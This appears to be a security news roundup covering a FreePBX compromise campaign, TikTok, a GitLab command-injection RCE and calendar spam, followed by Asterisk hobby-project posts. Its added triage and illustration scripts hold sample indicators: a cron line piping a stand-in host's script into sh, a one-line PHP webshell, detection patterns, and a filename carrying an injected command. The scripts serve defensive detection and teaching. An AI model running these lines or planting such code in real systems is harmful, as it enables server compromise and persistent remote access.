This Week In Security: Asterisk, TikTok, Gitlab, And Finally A Spam Solution

There’s an ongoing campaign that’s compromising FreePBX systems around the world. It seems to be aimed specifically at Elastix systems, using CVE-2021-45461, a really nasty Remote Code Execution (RCE) from December of last year. This flaw was a 0-day, as it was discovered by analyzing a compromised FreePBX system. It’s unclear if the campaign described in last week’s report was using the 0-day back in December, or if it was launched as a result of the public disclosure of the bug.

Regardless, the flaw is triggered by a crafted URL parameter sent to the Rest Phone Apps service. This module is intended to run right on the screen of VoIP phones, letting end users set features like Do Not Disturb without punching in star codes or visiting a web page. Because of that use case, any FreePBX deployment that uses this feature with VoIP phones connecting from outside the network needs the service’s ports reachable from the Internet. The best way to secure that is to require the phones to connect over a VPN, which only some phones natively support; failing that, at least restrict those ports to the phones’ known source addresses at the firewall.

Upon finding a vulnerable endpoint, the campaign starts by dropping a webshell in several locations, each obfuscated slightly differently. It then creates multiple root-level user accounts and adds a cron job to maintain access. There is a surprising amount of obfuscation and stealth in this malware family, which makes it hard to point to a single Indicator of Compromise. If you run a FreePBX system that may have the Phone Apps module running, it’s time to go through it with a fine-toothed comb.
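A starting point for that fine-toothed comb, as an added example that is not code from this article or from the researchers’ report: three generic checks in POSIX sh for the things described above, extra UID-0 accounts, cron entries that fetch and run code, and PHP files carrying common webshell idioms. The sample passwd, crontab and web-root contents are constructed so the script runs offline, and the grep patterns are general heuristics, not this campaign’s actual indicators.

```shell
#!/bin/sh
# Added triage example; not code from the article or from the researchers'
# report. Three generic checks for a compromised FreePBX host: extra UID-0
# accounts, cron entries that fetch and run code, and PHP files carrying common
# webshell idioms. Patterns are heuristics, not this campaign's indicators.
set -u

# Every account with UID 0 other than root in the passwd file $1.
extra_root_accounts() {
  awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Non-comment cron lines in $1 that download code, decode payloads, or point
# into the web root (a cron job is what the malware uses to keep access).
suspicious_cron() {
  grep -Ev '^[[:space:]]*#' "$1" | grep -E 'curl|wget|base64|/var/www/html/' || true
}

# PHP files under $1 using eval/decoders or calling a function named by a
# request parameter, the usual shape of an obfuscated webshell.
webshell_candidates() {
  find "$1" -type f -name '*.php' -exec grep -lE \
    'eval\(|base64_decode\(|gzinflate\(|str_rot13\(|\$_(GET|POST|REQUEST)\[[^]]*\]\(' \
    {} + 2>/dev/null || true
}

# Constructed sample data so this runs offline. On a real host set PASSWD,
# CRON and WEBROOT to /etc/passwd, the crontab files and the web root
# (assumed to be /var/www/html on a FreePBX install).
WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT
PASSWD="$WORK/passwd"; CRON="$WORK/crontab"; WEBROOT="$WORK/html"
mkdir -p "$WEBROOT/admin"

cat > "$PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
asterisk:x:1000:1000::/var/lib/asterisk:/sbin/nologin
sysadm:x:0:0::/root:/bin/bash
EOF

cat > "$CRON" <<'EOF'
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root curl -s http://example.invalid/p.sh | sh
EOF

cat > "$WEBROOT/admin/config.php" <<'EOF'
<?php $amp_conf = array(); ?>
EOF

cat > "$WEBROOT/admin/x.php" <<'EOF'
<?php eval(base64_decode($_POST['c'])); ?>
EOF

# Run the checks and print anything found.
echo "== extra UID-0 accounts";  extra_root_accounts "$PASSWD"
echo "== suspicious cron lines"; suspicious_cron "$CRON"
echo "== webshell candidates";   webshell_candidates "$WEBROOT"
```

Expect some noise on a real install: FreePBX’s own modules call base64_decode legitimately, so compare any flagged file against a clean install of the same module versions (or the package’s file hashes) rather than trusting a hit on its own, and check file modification times under the web root while you are there.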

What’s The Deal with TikTok?

The FCC has once again called for TikTok to be de-listed from the Google Play Store and the Apple App Store. What is going on with TikTok? It’s just an app for filming and sharing silly videos, right? There are essentially two potential problems with TikTok, and both trace back to the app’s parent company residing in China.

Here in the US we have National Security Letters, and China seems to have a more straightforward system, where “everything is seen in China,” as said by a member of TikTok’s Trust and Safety Department. TikTok uses quite a few permissions, some of which seem a bit overzealous. If you’re a person of interest to the Chinese government, could those permissions be used to surveil you? Absolutely. Just like a US based app could, as a result of a National Security Letter.

The second problem is a bit more subtle, and may stray towards a conspiracy theory, but is worth considering. TikTok has videos about every subject imaginable, from every possible viewpoint. What if the Chinese Communist Party (CCP) wanted a specific rumor to gain traction in the US? Just a little pressure on the video recommendation algorithm would make videos about that topic trend. Instant public opinion lever.

There’s likely a missing piece of the story here, in the form of some classified intel. Until enough time goes by that a Freedom of Information Act request can unlock the rest of the story, it’s going to be unclear how much of the TikTok threat is legitimate, and how much is geo-political wrangling.

Oh, and if you thought you could just open up the Google Play Store and see the exact permissions the TikTok app uses, Google made the unfortunate decision to hide permissions until you actually do the install. That sounds like a terrible decision and, after a brief outcry, it seems like Google agrees. Just before this article went to press, Google announced that it was walking back that decision.

Gitlab RCE

Gitlab fixed a very serious problem in its 4th of July round of minor version releases, and [Nguyễn Tiến Giang (Jang)] really wanted to understand what was going on with this one. So much so that he set up a debuggable install of Gitlab and recreated the issue, bringing us along for the ride. The flaw is in importing an existing Gitlab project, where the archive name is appended directly to a command string. If you can manipulate the value given for the archive name, and avoid tripping any of the checks intended to prevent exactly that, you can insert shell commands that get run on the underlying server. Avoiding those traps is the bulk of the work to turn this into a real PoC. Read the post for full details on the debugging journey.
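The bug class in sh, as an added illustration that is not GitLab’s Ruby code or [Jang]’s PoC: an attacker-chosen archive name spliced into a command string, next to the argv form that never re-parses it, plus the kind of allow-list that should sit in front of either. The EVIL_NAME value is constructed, and echo stands in for the real extraction command.

```shell
#!/bin/sh
# Added illustration of the bug class; not GitLab's Ruby code or [Jang]'s PoC.
# An attacker-chosen archive name spliced into a command string, next to the
# argv form that never re-parses it. echo stands in for the real extractor.
set -u

# Constructed attacker input: a plausible filename with a command appended.
EVIL_NAME='backup.tar.gz; echo INJECTED'

# Vulnerable: $1 is expanded into the string before sh -c parses it, so the
# shell sees the ';' and runs the attacker's second command.
extract_unsafe() {
  sh -c "echo extracting $1"
}

# Hardened: the command text is a fixed literal and the name arrives as $1 of
# the child shell, so it is one argument no matter what characters it holds.
extract_safe() {
  sh -c 'echo extracting "$1"' extract "$1"
}

# Defence in depth: allow-list the name before it reaches any command at all.
valid_archive_name() {
  case "$1" in
    *.tar.gz) ;;                      # must end like an archive
    *)        return 1 ;;
  esac
  case "$1" in
    *[!A-Za-z0-9._-]*) return 1 ;;    # nothing outside a safe character set
    .*)                return 1 ;;    # no leading dot, so no '..' tricks
  esac
  return 0
}

echo "--- unsafe:"; extract_unsafe "$EVIL_NAME"
echo "--- safe:";   extract_safe "$EVIL_NAME"
if valid_archive_name "$EVIL_NAME"; then echo "accepted"; else echo "rejected: $EVIL_NAME"; fi
```

The unsafe form prints two lines, the second being the injected command’s output; the safe form prints the whole name, semicolon and all, as one literal argument. The allow-list is the piece that GitLab’s checks were meant to provide; the lesson of the write-up is that a filter around a string-built command is a trap to be walked around, whereas the argv form removes the shell from the path entirely.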

Calendar Spam Finally Fixed

Consider yourself lucky if you’ve missed out on the scourge that is calendar spam. Google Calendar is convenient because anyone can send you an email with an invite, and the event automatically shows up on your calendar. In retrospect it seems obvious that this would be abused for spam. Regardless, after years of the problem, Google is finally rolling out a setting to only add invitations to your calendar from known senders. If you suffer from this spam yourself, or get asked about it, look under the event settings and flip that option. Finally!

Convert A Rotary Phone To VOIP Using Raspberry Pi

There’s something so nostalgic about the rotary phone that makes it a fun thing to hack and modernize. [Voidon] put his skills to the test and converted one to VoIP using a Raspberry Pi. He used the RasPi’s GPIO pins to read pulses from the rotary dial – a functional dial is always a welcome feature in rotary phone hacks. An old USB sound card was perfect for the microphone and handset audio.

As with any build, there were unexpected size issues that needed to be worked around. While the RasPi fit inside the case well, there was no room for the USB power jack or an ethernet cable, let alone a USB power bank for portability. The power bank idea was scrapped. [Voidon] soldered the power cord to the RasPi before the polyfuse to preserve the surge protection, used a mini-USB wifi dongle, and soldered a new USB connector to the sound card. [Voidon] also couldn’t get the phone’s original ringer to work, so he used the Raspberry Pi’s internal sound card to play ringtones.

The VoIP (SIP) side is handled by some Python scripting, available on GitHub. [Voidon] has some experience using Asterisk at his day job, so it will be interesting to see if he incorporates it in the future.

[via Reddit]

Bypassing Broken SIP ALG Implementations

SIP is the signaling protocol behind most IP telephony. Unfortunately it’s notorious for NAT traversal problems, because the addresses and ports it carries inside its messages don’t survive address translation. Even some major vendors can’t seem to get it right. [Stephen] had this problem with his Cisco WRVS4400N router. After a bit of troubleshooting, he was able to come up with a workaround that others may find useful.

The router had built-in SIP ALG functionality, but it just didn’t work. [Stephen] was trying to route SIP traffic from a phone to an Asterisk PBX system behind the router. The router just couldn’t properly handle these packets, regardless of whether SIP ALG was enabled or disabled.

[Stephen] first tried changing the SIP port on the external VoIP phone from the default of 5060 to something else. Then he set up port forwarding on the router to deliver that traffic to the Asterisk system on the original port. This sort of worked: the calls would go through, but they would drop after about 20 seconds.

The only thing that [Stephen] could get to work completely was to change the SIP port in Asterisk’s sip.conf file using the “bindport” directive. He changed it to some random unused high port number. Then he set up port forwarding on the router to forward incoming UDP packets on that port to the Asterisk system. This worked fine, but now all of the original phones behind the router stopped working, because they were configured to use the default port of 5060.

Rather than reconfigure every phone in the organization, [Stephen] made one change on the Asterisk system: an iptables rule that redirects incoming traffic on UDP port 5060 to the new SIP port. Now all of the phones work with minimal changes across the organization. It’s a lot of hassle to go through just because the router couldn’t handle SIP correctly, but it gets the job done.
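The last two steps as a script, added here rather than taken from [Stephen]’s post: rewrite bindport in sip.conf and emit the iptables REDIRECT rule that sends UDP 5060 to the new port on the Asterisk host. The port number 25060 and the sample sip.conf are assumptions; the rule is only applied when run as root with APPLY=1, otherwise it is printed.

```shell
#!/bin/sh
# Added example, not [Stephen]'s own commands: move chan_sip's listener to an
# unused high port in sip.conf and redirect UDP 5060 to it on the Asterisk
# host, so phones keep their default port. NEW_PORT=25060 and the sample
# sip.conf are assumptions; the iptables rule is applied only as root with
# APPLY=1, otherwise it is printed.
set -u

NEW_PORT="${NEW_PORT:-25060}"

# Accept only a numeric, unprivileged port that is not 5060 itself.
valid_sip_port() {
  case "$1" in ''|*[!0-9]*) return 1 ;; esac
  [ "$1" -ge 1024 ] && [ "$1" -le 65535 ] && [ "$1" -ne 5060 ]
}

# Replace an existing bindport line in sip.conf $1, or add one under [general].
set_bindport() {
  conf="$1"; port="$2"; tmp="$1.tmp"
  if grep -Eq '^[[:space:]]*bindport[[:space:]]*=' "$conf"; then
    awk -v p="$port" '/^[[:space:]]*bindport[[:space:]]*=/ { print "bindport=" p; next } { print }' \
      "$conf" > "$tmp"
  else
    awk -v p="$port" '{ print } /^\[general\][[:space:]]*$/ { print "bindport=" p }' \
      "$conf" > "$tmp"
  fi
  mv "$tmp" "$conf"
}

# Read back the port Asterisk will bind after the change.
get_bindport() {
  awk -F= '/^[[:space:]]*bindport[[:space:]]*=/ { gsub(/[[:space:]]/, "", $2); print $2 }' "$1"
}

# The NAT rule: phones still send to 5060; netfilter rewrites the destination
# to NEW_PORT before Asterisk sees it, and conntrack maps the replies back.
redirect_rule() {
  printf 'iptables -t nat -A PREROUTING -p udp --dport 5060 -j REDIRECT --to-ports %s\n' "$1"
}

# Constructed sip.conf so the script runs offline; use /etc/asterisk/sip.conf
# on the real PBX.
WORK="$(mktemp -d)"
SIP_CONF="$WORK/sip.conf"
cat > "$SIP_CONF" <<'EOF'
[general]
context=default
bindport=5060
EOF

valid_sip_port "$NEW_PORT" || { echo "NEW_PORT must be 1024-65535 and not 5060" >&2; exit 1; }
set_bindport "$SIP_CONF" "$NEW_PORT"
echo "sip.conf bindport is now $(get_bindport "$SIP_CONF"); restart Asterisk so it takes effect"
if [ "${APPLY:-0}" = 1 ] && [ "$(id -u)" -eq 0 ]; then
  eval "$(redirect_rule "$NEW_PORT")"
else
  echo "run as root with APPLY=1 to add:"; redirect_rule "$NEW_PORT"
fi
```

The router side is unchanged from the post: forward the external high port to the Asterisk box. Two caveats: this is for chan_sip, and on a chan_pjsip system the equivalent is the bind setting of the transport in pjsip.conf; and whichever high port you expose to the Internet is still a SIP listener, so keep fail2ban or an address allow-list in front of it.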

Breathe New Life Into Payphones With Asterisk

Payphones used to be found on just about every street corner. They were a convenience, now replaced by the ubiquitous mobile phone. These machines were the stomping grounds for many early computer hackers, and as a result hold a place in hacker history. If you’ve ever wanted to re-live the good ol’ days, [hharte’s] project might be for you.

[hharte] has been working to make these old payphones useful again with some custom hardware and software. The project intends to be an interface between a payphone and an Asterisk PBX system. On the hardware side, the controller board is capable of switching various high voltage signals required for coin-line signaling. The controller uses a Teensy microcontroller to detect the hook status as well as to control the relays. The current firmware features are very basic, but functional.

[hharte] also wrote a custom AGI script for Asterisk. The script lets Asterisk detect the 1700 Hz and 2200 Hz tones transmitted when coins drop into the machine. It is also at an early stage, but it will prompt for money and then place the call once 25 cents has been deposited. All of the schematics and code can be found on the project’s GitHub page.

[Thanks mies]

Hacking A Pogoplug Into A $20 PBX

The Pogoplug Series 4 is a little network attached device that makes your external drives accessible remotely. Under the hood of this device is an ARM processor running at 800 MHz, which is supported by the Linux kernel. If you’re looking to build your own PBX on the cheap, [Ward] runs us through the process. Since the Pogoplug 4 is currently available for about $20, it’s a cheap way to play with telephony.

Step one is to convert the Pogoplug to Debian, which mostly requires following instructions carefully. After the Pogoplug is booting Debian, the Incredible PBX bundle can be installed. We’ve seen this bundle running on a Raspberry Pi in the past. Incredible PBX’s preconfigured setup based on Asterisk and FreePBX gives a ton of functionality out of the box.

With your $20 PBX running, there’s a lot that can be done. Google’s Voice service allows unlimited free calling to the USA and Canada. With Internet connectivity, you get email notifications for voicemails, and can query WolframAlpha by voice.

Get Phone Calls Answered With The Moshi Moshi

Have a significant other that isn’t the best at picking up the phone? [Aaron] was having a hard time reaching his wife, so he hacked up a solution. The Moshi Moshi detects calls from [Aaron], and plays music to get her attention.

A remote server running Asterisk picks up the call and uses a Ruby script to log the call. Every ten seconds, an Arduino Due with an Ethernet shield polls a Sinatra web server to see if a call has arrived. If a new call has come in, a music loop is played. Getting the Due to loop audio was a bit of a challenge, but the end result sounds good.

Quite a bit of tech is brought together to make the Moshi Moshi, and all the code is provided in the write up. This could be helpful to anyone looking to combine hardware with the Asterisk PBX. After the break, [Aaron] shows us how the system works.

Building A PBX Setup Around The Raspberry Pi

We’re not sure why this use didn’t immediately come to mind when we got our hands on a Raspberry Pi board, but the hardware is almost perfect as a PBX system. PBX, or Private Branch Exchange, is basically an in-house phone system. This guide which [Ward] put together shows you how to do some interesting things with it.

When talking about PBX setups, the most common software package is Asterisk. That’s what’s at work here, rolled up with a bunch of other helpful software in an RPi-targeted distro called Incredible PBX. All it takes to get up and running is to partition and burn the image to an SD card like any other RPi distro. The configuration ends up being most of the work, starting with changing the default password, and moving on to customizing the environment to match your phone numbers and your needs. As with PBX setups on other embedded Linux devices, Google Voice is your best friend. The service will set you up with a free phone number.

This guide doesn’t delve into hardware-connected handsets. You’ll need to use a SIP phone. But that’s easy enough, as there are free apps for most smartphones that will do the trick.

[Thanks Jamie]